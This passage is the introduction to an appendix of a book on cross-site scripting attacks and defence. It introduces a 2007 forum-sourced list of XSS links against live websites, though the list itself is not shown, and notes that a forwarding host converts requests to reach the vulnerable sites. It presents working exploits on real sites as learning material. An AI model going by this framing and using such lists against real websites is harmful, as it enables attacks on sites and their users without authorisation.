XSS Exploits: Cross Site Scripting Exploits and Defense

Appendix A: The Owned List

The following list was pulled from http://sla.ckers.org/forum/read.php?3,44,page=1 in March 2007 (the entries may not work in all browsers). Where you see WhiteAcid.org in an entry, that host is forwarding your request to the actual vulnerable website by converting the GET request into a POST request. This isn't every link; these are only a handful of the links found by the sla.ckers.org community. The best way to learn how XSS works is to see working examples, and these are a small slice of the vulnerabilities that were live on the web at the time.

